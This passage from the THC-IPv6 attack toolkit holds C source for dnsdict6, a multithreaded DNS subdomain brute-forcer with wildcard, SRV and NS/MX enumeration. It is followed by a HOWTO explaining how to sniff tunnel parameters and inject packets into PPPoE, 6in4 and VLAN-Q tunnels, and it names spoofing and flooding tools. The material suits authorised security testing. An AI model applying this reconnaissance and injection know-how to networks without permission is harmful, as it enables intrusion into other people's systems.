06312580442146732554 for (i = 0; i < max; ++i) s[i] = '0' + (rand() % 10); s[max] = 0; strcat(s, "0193."); strcat(s, dom); #if DEBUG printf("random subdomain for wildcard testing: %s\n", s); #endif // random subdomain resolves, thus wildcards are enabled if ((status = getaddrinfo(s, NULL, &hints, &res)) == 0) { fprintf(stderr, "Warning: wildcard domain configured\n"); q = NULL; q4 = NULL; for (p = res; p != NULL; p = p->ai_next) { if (do6 && p->ai_family == AF_INET6) { // IPv6 ipv6 = (struct sockaddr_in6 *) p->ai_addr; addr = &(ipv6->sin6_addr); if (q == NULL || memcmp(&ipv6->sin6_addr, &q->sin6_addr, 16) != 0) { q = ipv6; if (wcard < MAX_WCARD) { memcpy(wildcardIpStr[wcard], addr, 16); wcard++; } inet_ntop(p->ai_family, addr, ipv6str, sizeof ipv6str); printf("*.%s => %s\n", dom, ipv6str); } } else if (do4 && p->ai_family == AF_INET) { ipv4 = (struct sockaddr_in *) p->ai_addr; addr4 = &(ipv4->sin_addr); if (q4 == NULL || memcmp(&ipv4->sin_addr, &q4->sin_addr, 4) != 0) { q4 = ipv4; if (wcard4 < MAX_WCARD) { memcpy(wildcardIpStr4[wcard4], addr4, 4); wcard4++; } inet_ntop(p->ai_family, addr4, ipv4str, sizeof ipv4str); printf("*.%s -> %s\n", dom, ipv4str); } } } freeaddrinfo(res); } for (i = 0; i < max; ++i) s[i] = 'a' + (rand() % 26); s[max] = 'y'; s[max + 1] = 'c'; s[max + 2] = 'a'; s[max + 3] = 'y'; #if DEBUG printf("random subdomain for wildcard testing: %s\n", s); #endif // random subdomain resolves, thus wildcards are enabled if ((status = getaddrinfo(s, NULL, &hints, &res)) == 0) { if (wcard == 0) fprintf(stderr, "Warning: wildcard domain configured (2nd test)\n"); q = NULL; q4 = NULL; for (p = res; p != NULL; p = p->ai_next) { if (do6 && p->ai_family == AF_INET6) { // IPv6 ipv6 = (struct sockaddr_in6 *) p->ai_addr; addr = &(ipv6->sin6_addr); if (q == NULL || memcmp(&ipv6->sin6_addr, &q->sin6_addr, 16) != 0) { q = ipv6; if (wcard < MAX_WCARD) { k = 1; if (wcard > 0) for (j = 0; j < wcard; j++) if (memcmp(wildcardIpStr[j], addr, 16) == 0) k = 0; if (k) { 
memcpy(wildcardIpStr[wcard], addr, 16); wcard++; inet_ntop(p->ai_family, addr, ipv6str, sizeof ipv6str); printf("*.%s => %s\n", dom, ipv6str); } } } } else if (do4 && p->ai_family == AF_INET) { ipv4 = (struct sockaddr_in *) p->ai_addr; addr4 = &(ipv4->sin_addr); if (q4 == NULL || memcmp(&ipv4->sin_addr, &q4->sin_addr, 4) != 0) { q4 = ipv4; if (wcard4 < MAX_WCARD) { k = 1; if (wcard4 > 0) for (j = 0; j < wcard4; j++) if (memcmp(wildcardIpStr4[j], addr4, 4) == 0) k = 0; if (k) { memcpy(wildcardIpStr4[wcard4], addr4, 4); wcard4++; inet_ntop(p->ai_family, addr4, ipv4str, sizeof ipv4str); printf("*.%s -> %s\n", dom, ipv4str); } } } } } freeaddrinfo(res); } if (wcard) return TRUE; else return FALSE; } // return number of milliseconds delayed unsigned short int dodelay(unsigned short int maxmillisecs) { unsigned short int n = 0; srand(time(NULL)); n = rand() % maxmillisecs; ++n; maxmillisecs = n; #if DEBUG printf("sleeping %d milliseconds ...\n", maxmillisecs); #endif usleep(maxmillisecs * 1000); return maxmillisecs; } // return true if domain is valid, false otherwise int isValidDomain(char *d) { unsigned int i = 0; char *tld; size_t len; if (d[strlen(d) - 1] == '.') d[strlen(d) - 1] = 0; if (strlen(d) < 4) // smallest possible domain provided. e.g. a.de return FALSE; if (!strstr(d, ".")) // target domain must have at least one dot. e.g. target.va, branch.target.va return FALSE; if (strlen(d) > 100) return FALSE; tld = strstr(d, "."); tld = tld + 1; while (strstr(tld, ".")) { tld = strstr(tld, "."); tld = tld + 1; } #if DEBUG printf("tld\'s length: %d\n", strlen(tld)); printf("dom: %s tld: %s\n", d, tld); #endif if ((strlen(tld) < 2) || (strlen(tld) > 6)) // tld must be between 2-6 char. e.g. .museum, .uk return FALSE; // valid domain can only contain digits, letters, dot (.) 
and dash symbol (-) len = strlen(d); for (i = 0; i < len; ++i) { if (!(d[i] >= '0' && d[i] <= '9') && !(d[i] >= 'a' && d[i] <= 'z') && !(d[i] >= 'A' && d[i] <= 'Z') && !(d[i] >= '-' && d[i] <= '.')) return FALSE; } return TRUE; } void threaded_resolve(char *list[]) { int i = 0, j, k; char dom[MAXSTRSIZE] = "", *foo = "", buf[1024]; void *addr, *addr4; struct addrinfo hints, *res, *p; int status, found2; char ipv6str[INET6_ADDRSTRLEN], ipv4str[16]; struct sockaddr_in6 *ipv6, *q; struct sockaddr_in *ipv4, *q4; memset(&hints, 0, sizeof hints); hints.ai_family = dof; // AF_INET or AF_INET6 to force version if (type == NULL) type = foo; i = 0; while (list[i] != NULL && list[i][0] != 0) { snprintf(dom, sizeof(dom), "%s.%s", list[i], domain); #if DEBUG printf("brute-forced domain: %s\n", dom); #endif // ipv6 code modded from www.kame.net if ((status = getaddrinfo(dom, NULL, &hints, &res)) == 0) { q = NULL; q4 = NULL; found2 = 0; for (p = res; p != NULL; p = p->ai_next) { if (do6 && p->ai_family == AF_INET6) { // IPv6 ipv6 = (struct sockaddr_in6 *) p->ai_addr; addr = &(ipv6->sin6_addr); // convert the IP to a string and print it: if (q == NULL || memcmp(&ipv6->sin6_addr, &q->sin6_addr, 16) != 0) { q = ipv6; k = 1; if (wcard) for (j = 0; j < wcard; j++) if (memcmp(addr, wildcardIpStr[j], 16) == 0) k = 0; if (k) { if (found2 == 0) { ++found; found2 = 1; } inet_ntop(p->ai_family, addr, ipv6str, sizeof ipv6str); sprintf(buf, "%s => %s\n", dom, ipv6str); printf("%s", buf); ++ipCount; if (ucount < MAX_UNIQUE) { if (ucount) for (j = 0; j < ucount; j++) if (memcmp(addr, unique[j], 16) == 0) k = 0; if (k) { memcpy(unique[ucount], addr, 16); ucount++; } } } } } else if (do4 && p->ai_family == AF_INET) { ipv4 = (struct sockaddr_in *) p->ai_addr; addr4 = &(ipv4->sin_addr); if (q4 == NULL || memcmp(&ipv4->sin_addr, &q4->sin_addr, 4) != 0) { q4 = ipv4; k = 1; if (wcard4) for (j = 0; j < wcard4; j++) if (memcmp(wildcardIpStr4[j], addr4, 4) == 0) k = 0; if (k) { if (found2 == 0) { 
++found; found2 = 1; } inet_ntop(p->ai_family, addr4, ipv4str, sizeof ipv4str); sprintf(buf, "%s => %s\n", dom, ipv4str); printf("%s", buf); ++ipCount4; if (ucount4 < MAX_UNIQUE) { if (ucount4) for (j = 0; j < ucount4; j++) if (memcmp(addr4, unique4[j], 4) == 0) k = 0; if (k) { memcpy(unique4[ucount4], addr4, 4); ucount4++; } } } } } } freeaddrinfo(res); // free the linked list } // end of if conditional // user wants delay between DNS requests? if (delay) dodelay(milliseconds); i++; } return; } int dnsquerycode(char *sub, char *domain, int type) { char vbuf[256], dom[256]; memset(vbuf, 0, sizeof(vbuf)); snprintf(dom, sizeof(dom), "%s.%s", sub, domain); res_query(dom, ns_c_in, type, vbuf, sizeof(vbuf)); if (vbuf[2] == 0) return -1; else return (vbuf[3] & 15); } void threaded_resolve_srv(char *list[]) { char dom[MAXSTRSIZE] = "", buf[1024]; int len, cnt, i, j, k, found = 0, found1, found4 = 0, found2; unsigned short int *port, *prio, *weight; unsigned char vbuf[1500], *vptr; char dbuf[256]; struct addrinfo hints, *res, *p; struct sockaddr_in6 *ipv6, *q; char ipv6str[INET6_ADDRSTRLEN], ipv4str[16]; struct sockaddr_in *ipv4, *q4; void *addr, *addr4; if (type == NULL) return; memset((char *) &hints, 0, sizeof(hints)); hints.ai_family = dof; i = 0; while (list != NULL && list[i] != NULL && list[i][0] != 0) { snprintf(dom, sizeof(dom), "%s.%s.%s", list[i], type, domain); memset(vbuf, 0, 4); #if DEBUG printf("brute-forced domain: %s\n", dom); #endif if ((len = res_query(dom, ns_c_in, ns_t_srv, vbuf, sizeof(vbuf))) > 0 && (vbuf[3] & 15) == 0 && (cnt = vbuf[7]) > 0) { vptr = vbuf + strlen(dom) + 17; ucountsrv++; for (j = 0; j < cnt && len - (vptr - vbuf) >= 20; j++) { vptr += 10; k = vptr[1] + vptr[0] * 256; vptr += 2; prio = (unsigned short int *) (vptr); weight = (unsigned short int *) (vptr + 2); port = (unsigned short int *) (vptr + 4); dbuf[0] = 0; dn_expand(vbuf, vbuf + len, vptr + 6, dbuf, sizeof(dbuf)); if (getaddrinfo(dbuf, NULL, &hints, &res) == 0) { q = NULL; q4 
= NULL; found1 = 0; found2 = 0; for (p = res; p != NULL; p = p->ai_next) { if (do6 && p->ai_family == AF_INET6) { // IPv6 ipv6 = (struct sockaddr_in6 *) p->ai_addr; addr = &(ipv6->sin6_addr); if (q == NULL || memcmp(&ipv6->sin6_addr, &q->sin6_addr, 16) != 0) { q = ipv6; // convert the IP to a string and print it: inet_ntop(p->ai_family, addr, ipv6str, sizeof ipv6str); snprintf(buf, sizeof(buf), "%s => %s is %s port %d %s (prio %d weight %d)\n", dom, dbuf, ipv6str, htons(*port), strcmp(type, "_tcp") == 0 ? "TCP" : "UDP", htons(*prio), htons(*weight)); printf("%s", buf); if (found1 == 0) { ++found; found1 = 1; } } } else if (do4 && p->ai_family == AF_INET) { // IPv4 ipv4 = (struct sockaddr_in *) p->ai_addr; addr4 = &(ipv4->sin_addr); if (q4 == NULL || memcmp(&ipv4->sin_addr, &q4->sin_addr, 4) != 0) { q4 = ipv4; // convert the IP to a string and print it: inet_ntop(p->ai_family, addr4, ipv4str, sizeof ipv4str); snprintf(buf, sizeof(buf), "%s => %s is %s port %d %s (prio %d weight %d)\n", dom, dbuf, ipv4str, htons(*port), strcmp(type, "_tcp") == 0 ? "TCP" : "UDP", htons(*prio), htons(*weight)); printf("%s", buf); if (found2 == 0) { ++found4; found2 = 1; } } } } freeaddrinfo(res); } else { snprintf(buf, sizeof(buf), "%s => %s port %d %s (prio %d weight %d)\n", dom, dbuf, htons(*port), strcmp(type, "_tcp") == 0 ? 
"TCP" : "UDP", htons(*prio), htons(*weight)); printf("%s", buf); } vptr += k; ucountsrvs++; } } //else printf("srv: %s %d len %d code %d valid\n", dom, len, (vbuf[3] & 15), vbuf[2]); if ((vbuf[3] & 15) == 0 && vbuf[2] > 0) { memset(vbuf, 0, 4); if ((len = res_query(dom, ns_c_in, ns_t_any, vbuf, sizeof(vbuf))) > 0 && (vbuf[3] & 15) == 0 && (cnt = vbuf[7]) > 0) { if ((vbuf[2] & 2) == 2) fprintf(stderr, "Warning: truncated answer for entry \"%s\" type ANY\n", dom); vptr = vbuf + strlen(dom) + 17; ucountsrv++; for (j = 0; j < cnt && len - (vptr - vbuf) >= 20; j++) { k = vptr[11] + vptr[10] * 256; if (vptr[2] == 0 && vptr[3] == 0x0c) { dbuf[0] = 0; dn_expand(vbuf, vbuf + len, vptr + 12, dbuf, sizeof(dbuf)); if (getaddrinfo(dbuf, NULL, &hints, &res) == 0) { q = NULL; q4 = NULL; found1 = 0; found2 = 0; for (p = res; p != NULL; p = p->ai_next) { if (do6 && p->ai_family == AF_INET6) { // IPv6 ipv6 = (struct sockaddr_in6 *) p->ai_addr; addr = &(ipv6->sin6_addr); if (q == NULL || memcmp(&ipv6->sin6_addr, &q->sin6_addr, 16) != 0) { q = ipv6; // convert the IP to a string and print it: inet_ntop(p->ai_family, addr, ipv6str, sizeof ipv6str); snprintf(buf, sizeof(buf), "%s => %s is %s\n", dom, dbuf, ipv6str); printf("%s", buf); if (found1 == 0) { ++found; found1 = 1; } } } else if (do4 && p->ai_family == AF_INET) { // IPv4 ipv4 = (struct sockaddr_in *) p->ai_addr; addr4 = &(ipv4->sin_addr); if (q4 == NULL || memcmp(&ipv4->sin_addr, &q4->sin_addr, 4) != 0) { q4 = ipv4; // convert the IP to a string and print it: inet_ntop(p->ai_family, addr4, ipv4str, sizeof(ipv4str)); snprintf(buf, sizeof(buf), "%s => %s is %s\n", dom, dbuf, ipv4str); printf("%s", buf); if (found2 == 0) { ++found4; found2 = 1; } } } } freeaddrinfo(res); } else { snprintf(buf, sizeof(buf), "%s => %s\n", dom, dbuf); printf("%s", buf); } } vptr += k + 12; ucountsrvs++; } } //else printf("ptr: %s %d len %d code %d valid\n", dom, len, (vbuf[3] & 15), vbuf[2]); } // user wants delay between DNS requests? 
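// (The statements down to the first closing brace in column 0 finish threaded_resolve_srv(), which begins before this span.)
    if (delay)
      dodelay(milliseconds);
    i++;
  }

  return;
}

/*
 * Query the NS or MX records of `dom` and print every server name found
 * together with the addresses it resolves to.
 *
 * dom   domain to query. The parser skips strlen(dom) + 1 bytes for the
 *       question name, which matches a name written with its trailing dot
 *       (main() appends one before calling).
 * type  ns_t_ns or ns_t_mx, the two values main() passes.
 *
 * The reply is untrusted network data, so every offset derived from it is
 * checked against the end of the received message before it is used:
 *  - a failed query (negative length) is rejected before the size comparison,
 *    which used to be carried out in unsigned arithmetic and let -1 through;
 *  - the reported length is capped at the buffer size, in case the resolver
 *    reports more than it stored -- TODO confirm for the libresolv in use;
 *  - each record must hold its fixed part, and its full 16-bit RDLENGTH must
 *    fit, before the parser steps to the next record.
 * The walk still assumes every answer starts with a 2-byte compressed owner
 * name, as the original code did.
 */
void dump_dns(char *dom, int type) {
  int len, cnt, j, seen, found = 0, found1, found4 = 0, allfound = 0, found2;
  unsigned char vbuf[1500], *vptr = vbuf + 2, *vend, *rr, *name;
  size_t rdlen, fixed;
  char dbuf[256], fbuf[256][256];
  struct addrinfo hints, *res, *p;
  struct sockaddr_in6 *ipv6, *q;
  char ipv6str[INET6_ADDRSTRLEN], ipv4str[16];
  struct sockaddr_in *ipv4, *q4;
  void *addr, *addr4;
  const char *missing = type == ns_t_ns ? "name server (NS)" : "mail sever (MX)";

  memset(&hints, 0, sizeof(hints));
  hints.ai_family = dof;

  len = res_query(dom, ns_c_in, type, vbuf, sizeof(vbuf));
  if (len > (int) sizeof(vbuf))
    len = (int) sizeof(vbuf);
  // vptr points at the flags: require a response (0x80) that is not truncated (0x02) and has RCODE 0
  if (len < 0 || (size_t) len < 30 + strlen(dom) || (*vptr & 0x82) != 0x80 || (*(vptr + 1) & 0x0f) != 0) {
    fprintf(stderr, "Warning: no %s information found\n", missing);
    return;
  }
  vend = vbuf + len;

  vptr += 4;                    // ANCOUNT
  cnt = *vptr * 256 + *(vptr + 1);
  if (cnt < 1 || cnt > 16) {    // also keeps allfound far below the 256 rows of fbuf
    fprintf(stderr, "Warning: no %s information found\n", missing);
    return;
  }
  vptr += 6;                    // start of the question section
  vptr += strlen(dom) + 1;      // encoded question name
  vptr += 4;                    // QTYPE and QCLASS

  // we are now at the beginning of the answer section
  fixed = type == ns_t_mx ? 14 : 12;    // name(2) type(2) class(2) ttl(4) rdlength(2), plus the MX preference(2)
  while (cnt > 0 && vptr < vend) {
    rr = vptr;
    if ((size_t) (vend - rr) < fixed)
      break;                    // truncated record: nothing left that can be trusted
    rdlen = (size_t) rr[10] * 256 + rr[11];
    name = rr + fixed;
    dbuf[0] = 0;
    if (dn_expand(vbuf, vend, name, dbuf, sizeof(dbuf)) < 0)
      dbuf[0] = 0;
#if DEBUG
    printf("Found %s for %s: %s\n", type == ns_t_mx ? "MX" : "NS", dom, dbuf);
#endif
    if (dbuf[0] != 0) {
      dbuf[sizeof(dbuf) - 1] = 0;
      seen = 0;
      for (j = 0; j < allfound; j++)
        if (strcmp(dbuf, fbuf[j]) == 0)
          seen = 1;
      snprintf(fbuf[allfound], sizeof(fbuf[allfound]), "%s", dbuf);
      allfound++;
      // resolve each distinct server name only once
      if (seen == 0 && getaddrinfo(dbuf, NULL, &hints, &res) == 0) {
        q = NULL;
        q4 = NULL;
        found1 = 0;
        found2 = 0;
        for (p = res; p != NULL; p = p->ai_next) {
          if (do6 && p->ai_family == AF_INET6) {        // IPv6
            ipv6 = (struct sockaddr_in6 *) p->ai_addr;
            addr = &(ipv6->sin6_addr);
            // skip an address equal to the one printed just before
            if (q == NULL || memcmp(&ipv6->sin6_addr, &q->sin6_addr, 16) != 0) {
              q = ipv6;
              inet_ntop(p->ai_family, addr, ipv6str, sizeof ipv6str);
              printf("%s of %s is %s. => %s\n", type == ns_t_mx ? "MX" : "NS", dom, dbuf, ipv6str);
              if (found1 == 0) {
                ++found;
                found1 = 1;
              }
            }
          } else if (do4 && p->ai_family == AF_INET) {  // IPv4
            ipv4 = (struct sockaddr_in *) p->ai_addr;
            addr4 = &(ipv4->sin_addr);
            if (q4 == NULL || memcmp(&ipv4->sin_addr, &q4->sin_addr, 4) != 0) {
              q4 = ipv4;
              inet_ntop(p->ai_family, addr4, ipv4str, sizeof ipv4str);
              printf("%s of %s is %s. => %s\n", type == ns_t_mx ? "MX" : "NS", dom, dbuf, ipv4str);
              if (found2 == 0) {
                ++found4;
                found2 = 1;
              }
            }
          }
        }
        freeaddrinfo(res);
      }
    }
    if (rdlen > (size_t) (vend - (rr + 12)))
      break;                    // RDATA claims more bytes than the message holds
    vptr = rr + 12 + rdlen;
    cnt--;
  }

  if (found == 0 && do6)
    printf("No IPv6 address for %s entries found in DNS for domain %s\n", type == ns_t_mx ? "MX" : "NS", dom);
  if (found4 == 0 && do4)
    printf("No IPv4 address for %s entries found in DNS for domain %s\n", type == ns_t_mx ? "MX" : "NS", dom);
}

enum { DNSDICT_LIST_SLOTS = 65536 };    // pointer slots reserved for each per-thread word list

/* Allocate `size` bytes or terminate; a partly built word list is of no use. */
static void *dnsdict_xmalloc(size_t size) {
  void *ptr = malloc(size);

  if (ptr == NULL) {
    fprintf(stderr, "Error: out of memory\n");
    exit(-1);
  }
  return ptr;
}

/*
 * Create one empty word list per thread. The slots are sized from the element
 * type of the list itself; the former `65536 * sizeof(int)` reserved only half
 * of the slots wherever a pointer is wider than an int.
 */
static void dnsdict_alloc_lists(int nthreads) {
  int n;

  lists = dnsdict_xmalloc((size_t) nthreads * sizeof(*lists));
  for (n = 0; n < nthreads; n++) {
    listptr[n] = 0;
    lists[n] = dnsdict_xmalloc(DNSDICT_LIST_SLOTS * sizeof(*lists[n]));
  }
}

/* Append a copy of `word` to list `slot`, stopping while two slots remain for the terminators. */
static void dnsdict_push_word(int slot, const char *word, int nthreads) {
  lists[slot][listptr[slot]] = dnsdict_xmalloc(strlen(word) + 1);
  strcpy(lists[slot][listptr[slot]], word);
  listptr[slot] += 1;
  if (listptr[slot] >= DNSDICT_LIST_SLOTS - 2) {
    fprintf(stderr, "Error: wordlist too large (max: %d)!\n", DNSDICT_LIST_SLOTS * nthreads);
    exit(-1);
  }
}

/* Close every list with an empty string followed by NULL, the end marks the resolver threads test for. */
static void dnsdict_terminate_lists(int nthreads) {
  int n;

  for (n = 0; n < nthreads; n++) {
    lists[n][listptr[n]] = dnsdict_xmalloc(2);
    lists[n][listptr[n]][0] = 0;
    lists[n][listptr[n] + 1] = NULL;
  }
}

/*
 * Entry point: parse the options, validate the target domain, optionally print
 * its NS/MX records and SRV services, then split the word list across the
 * resolver threads and print a summary.
 *
 * Changes against the previous version:
 *  - the domain argument is checked for emptiness and for the 100-character
 *    limit isValidDomain() uses *before* it is copied into the global `domain`
 *    buffer (whose size is not visible here -- TODO confirm it holds 102 bytes);
 *  - the result of isValidDomain() is compared with TRUE; it returns TRUE/FALSE,
 *    so the former `< 0` test presumably never rejected anything;
 *  - tolower() receives an unsigned char value;
 *  - word lists are allocated with the right element size and checked
 *    allocations, and the built-in lists get the same capacity check as a file;
 *  - the word file is read until fscanf() stops converting, so the last word
 *    is no longer queued twice.
 */
int main(int argc, char *argv[]) {
  unsigned short wordlist = FALSE, threads = 8, dumpit = 0, showdns = 0;
  unsigned long int wcount = 0;
  int i = 0, j;
  char word[101], *wordlistFilename = NULL;     // 100 characters plus NUL, matching "%100s" below
  FILE *fpWords;
  char **sub_orig;
  pthread_t thread[MAX_THREADS];

  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL)
    printf("WARNING: %s is not working with injection!\n", argv[0]);

  // the last character of the program name preselects the address family
  do4 = 1;
  do6 = 1;
  if (argv[0] != NULL && argv[0][0] != 0)
    i = argv[0][strlen(argv[0]) - 1];
  if (i == '4')
    do6 = 0;
  if (i == '6')
    do4 = 0;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0 || strncmp(argv[1], "--h", 3) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "dt:smlxuSD46")) >= 0) {
    switch (i) {
    case '4':
      do4 = 1;
      break;
    case '6':
      // NOTE(review): this clears do6, so -6 can only switch IPv6 off; looks inverted -- confirm against the usage text
      do6 = 0;
      break;
    case 'd':
      showdns = 1;
      break;
    case 't':
      threads = atoi(optarg);
      break;
    case 's':
      sub = (char **) sub_small;
      break;
    case 'm':
      sub = (char **) sub_medium;
      break;
    case 'l':
      sub = (char **) sub_large;
      break;
    case 'x':
      sub = (char **) sub_xtreme;
      break;
    case 'u':
      sub = (char **) sub_uber;
      break;
    case 'D':
      dumpit = 1;
      break;
    case 'S':
      dosrv = 1;
      break;
    default:
      fprintf(stderr, "Error: unknown option -%c\n", i);
      exit(-1);
    }
  }

  if (do4 && do6)
    dof = 0;
  else if (do4 && do6 == 0)
    dof = AF_INET;
  else
    dof = AF_INET6;

  if (threads > MAX_THREADS) {
    threads = MAX_THREADS;
    fprintf(stderr, "Warning: setting threats to maximum of %d\n", threads);
  }
  if (threads < 1)
    threads = 1;

  if (dumpit) {
    for (i = 0; sub[i] != NULL && sub[i][0] != 0; i++)
      printf("%s\n", sub[i]);
    exit(0);
  }

  if (argc == optind || argc > optind + 2) {
    fprintf(stderr, "Error: invalid options, try \"-h\" for help!\n");
    exit(-1);
  }
  if (argc > (optind + 1)) {
    wordlist = TRUE;
    wordlistFilename = argv[optind + 1];
  }

  for (i = 0; argv[optind][i]; ++i)     // convert domain to lower case
    argv[optind][i] = (char) tolower((unsigned char) argv[optind][i]);

  // refuse an empty or over-long argument before it reaches the fixed-size global buffer
  if (argv[optind][0] == 0 || strlen(argv[optind]) > 100) {
    fprintf(stderr, "Error: domain seems not to be valid: %s\n", argv[optind]);
    exit(-1);
  }
  strcpy(domain, argv[optind]);
  if (domain[strlen(domain) - 1] == '.')
    domain[strlen(domain) - 1] = 0;
#if DEBUG
  printf("domain: %s\n", domain);
#endif
  // a lone "." is empty by now; isValidDomain() indexes the last character, so do not hand it ""
  if (domain[0] == 0 || isValidDomain(domain) != TRUE) {
    fprintf(stderr, "Error: domain seems not to be valid: %s\n", domain);
    exit(-1);
  }
  strcat(domain, ".");
  if (verifyDomain(domain) != TRUE) {
    fprintf(stderr, "Error: no name server (NS) entry for domain %s exists\n", domain);
    exit(-1);
  }

  printf("Starting DNS enumeration work on %s ...\n", domain);

  if (showdns) {
    printf("Gathering NS and MX information...\n");
    dump_dns(domain, ns_t_ns);
    dump_dns(domain, ns_t_mx);
    printf("\n");
  }

  if (dosrv) {
    sub_orig = sub;
    sub = (char **) sub_srv;
    printf("Starting SRV service enumeration\n");
    printf("Estimated time to completion: 1 to 4 minutes\n");

    dnsdict_alloc_lists(threads);
    i = 0;
    for (j = 0; sub[j] != NULL && sub[j][0] != 0; j++) {
      dnsdict_push_word(i, sub[j], threads);
      if (++i >= threads)
        i = 0;
      wcount++;
    }
    dnsdict_terminate_lists(threads);

    type = "_tcp";
    if (dnsquerycode(type, domain, ns_t_srv) == 0) {
      dosrv++;
      for (i = 0; i < threads; i++)
        pthread_create(&thread[i], NULL, (void *) threaded_resolve_srv, (void *) lists[i]);
      for (i = 0; i < threads; i++)
        pthread_join(thread[i], NULL);
    } else
      printf("No SRV entries for TCP\n");

    type = "_udp";
    if (dnsquerycode(type, domain, ns_t_srv) == 0) {
      dosrv++;
      for (i = 0; i < threads; i++)
        pthread_create(&thread[i], NULL, (void *) threaded_resolve_srv, (void *) lists[i]);
      for (i = 0; i < threads; i++)
        pthread_join(thread[i], NULL);
    } else
      printf("No SRV entries for UDP\n");

    if (dosrv > 1)
      printf("Found %d services with %d entries altogether\n\n", ucountsrv, ucountsrvs);
    sub = sub_orig;
    type = NULL;
  }

  // split wordlist to thread lists
  dnsdict_alloc_lists(threads);
  wcount = 0;
  i = 0;
  if (wordlist == TRUE) {
    fpWords = fopen(wordlistFilename, "r");
    if (fpWords == NULL) {
      fprintf(stderr, "Error: could not open file %s\n", wordlistFilename);
      exit(-1);
    }
    // wordlist subdomain not allowed to be more than 100 chars
    while (fscanf(fpWords, "%100s", word) == 1) {
      dnsdict_push_word(i, word, threads);
      wcount++;
      if (++i >= threads)
        i = 0;
    }
    fclose(fpWords);
  } else {
    for (j = 0; sub[j] != NULL && sub[j][0] != 0; j++) {
      dnsdict_push_word(i, sub[j], threads);
      if (++i >= threads)
        i = 0;
      wcount++;
    }
  }
  dnsdict_terminate_lists(threads);

  // never start more threads than there are words, but keep one so the estimate below cannot divide by zero
  if (wcount < threads)
    threads = wcount > 0 ? (unsigned short) wcount : 1;

  printf("Starting enumerating %s - creating %d threads for %d words...\n", domain, threads, (int) wcount);
  printf("Estimated time to completion: %d to %d minute%s\n", (int) ((wcount / 300) / threads) + 1, (int) ((wcount / 90) / threads) + 1,
         ((wcount / 60) / threads) + 1 > 1 ? "s" : "");

  // wildcard detection
  wildcarDetect(domain);

  for (i = 0; i < threads; i++)
    pthread_create(&thread[i], NULL, (void *) threaded_resolve, (void *) lists[i]);
  for (i = 0; i < threads; i++)
    pthread_join(thread[i], NULL);

  // the argument list of the second printf below, and the end of main(), follow on the next source line
  if (do4 && do6)
    printf("\nFound %d domain name%s, %d unique ipv4 and %d unique ipv6 addresses for %s\n", found, found == 1 ? "" : "s", ucount4 + wcard4, ucount + wcard, domain);
  else if (do4)
    printf("\nFound %d domain name%s and %d unique ipv4 address%s for %s\n", found, found == 1 ? "" : "s", ucount4 + wcard4, (ucount4 + wcard4) == 1 ?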
"" : "s", domain); else printf("\nFound %d domain name%s and %d unique ipv6 address%s for %s\n", found, found == 1 ? "" : "s", ucount + wcard, (ucount + wcard) == 1 ? "" : "s", domain); return 0; } thc-ipv6-2.5/HOWTO-INJECT0000644000000000000000000001111212234222353013305 0ustar rootrootINTRODUCTION ============ Since v1.91 the THC-IPv6 toolkit has injection support for PPPoE, 6in4 and VLAN-Q tunnels. For this to work, you must be on the network path where the PPPoE, 6in4 or VLAN-Q tunnel is traversing over. This is activated via environment variables. VLAN-Q ====== For VLAN-Q injection you have to set the environment variable THC_IPV6_VLAN with the necessary information in the following format: srcmac,dstmac,vlan-id To get this information, you must sniff the necessary information on the Ethernet you are injection from. This tcpdump command will help you: tcpdump -i eth0 -n -vvv -e ether proto 0x8100 you will need the source mac address, destination mac address and the VLAN ID. Be sure to set the source and destination mac address right :-) with this information you can set up the environment, e.g.: export THC_IPV6_VLAN=01:01:01:01:01:01,02:02:02:02:02:02,1 Note: the VLAN ID must be in decimal form. Also note that VLAN injection can be done additionally to PPPoE and 6in4 if required, just set the other environment variable as well! PPPoE ===== For PPPoE injection you have to set the environment variable THC_IPV6_PPPOE with the necessary information in the following format: srcmac,dstmac,ppp-sessionid To get this information, you must sniff the necessary information on the Ethernet you are injection from. This tcpdump command will help you: tcpdump -i eth0 -n -vvv -e ether proto 0x8864 you will need the source mac address, destination mac address and the PPP sessionID. 
Be sure to set the source and destination mac address right :-)
With this information you can set up the environment, e.g.:

  export THC_IPV6_PPPOE=01:01:01:01:01:01,02:02:02:02:02:02,0f2b

Note: the PPP SessionID must be in hexadecimal form, with leading zeros and
no 0x, \x or similar in front.


6in4
====

For 6in4 injection you have to set the environment variable THC_IPV6_6IN4
with the necessary information in the following format:

  srcmac,dstmac,src-ipv4,dst-ipv4

To get this information, you must sniff it on the Ethernet you are injecting
from. This tcpdump command will help you:

  tcpdump -i eth0 -n -e ip proto 41

You will need the source mac address, destination mac address, the source
IPv4 address and the destination IPv4 address.
Be sure to set the source and destination mac/IPv4 addresses right :-)
With this information you can set up the environment, e.g.:

  export THC_IPV6_6IN4=01:01:01:01:01:01,02:02:02:02:02:02,1.1.1.1,2.2.2.2


KEEPING THE SESSION ALIVE
=========================

In case you have to disconnect the client tunnel endpoint to perform your
tests, this will usually terminate the tunnel after some time, as the server
side often sends keep-alive packets.
There is a tool in the package called inject_alive that you can run to answer
these keep-alive packets.
Just run it with the proper environment variable and the interface:

  inject_alive eth0

If your tunnel type is PPPoE, it will even warn if the PPPoE session ID seen
is different to the one you specified in the environment (and uses the one
seen on the wire).


RUNNING THE TOOLS
=================

Running the tools is then a piece of cake: you just run them normally, and
the injection is all done in the background.

All tools will print one of the following messages when run in injection mode:

  Information: PPPoE injection/sniffin activated
or
  Information: 6in4 injection/sniffin activated

By this you see that the injection is active.
In case you run the tools in the wrong shell, one that does not have the
environment variable set, you will not see the message and therefore have an
indicator of what the problem is :-)

If the tool does not support injection you will see the following message:

  WARNING: ./tool6 is not working with injection!

One important thing to note!!
You might need to set a specific source ipv6 address with the tools to make
them work if global addresses (non-link-local addresses) are used.
E.g. when the source IPv6 to use is 2003::1 and the target is
ipv6.google.com =>

  thcping6 eth0 2003::1 ipv6.google.com
  alive26 -I 2003::1 eth0 ipv6.google.com
  trace6 -s 2003::1 eth0 ipv6.google.com

But of course it is easier to just configure that as your only global IPv6
address so that everything works, e.g.

  ip -6 addr add 2003::1/64 dev eth0

The following tools do not work with injection or are pointless to use there:

  parasite6 fake_solicitate6 fake_advertise6 connect6 detect_sniffer6
  flood_advertise6 flood_solicitate6 inverse_lookup6 dnsdict6 dnsrevenum6
  fake_dnsupdate6 fake_dhcps6 flood_dhcpc6


HELP?
=====

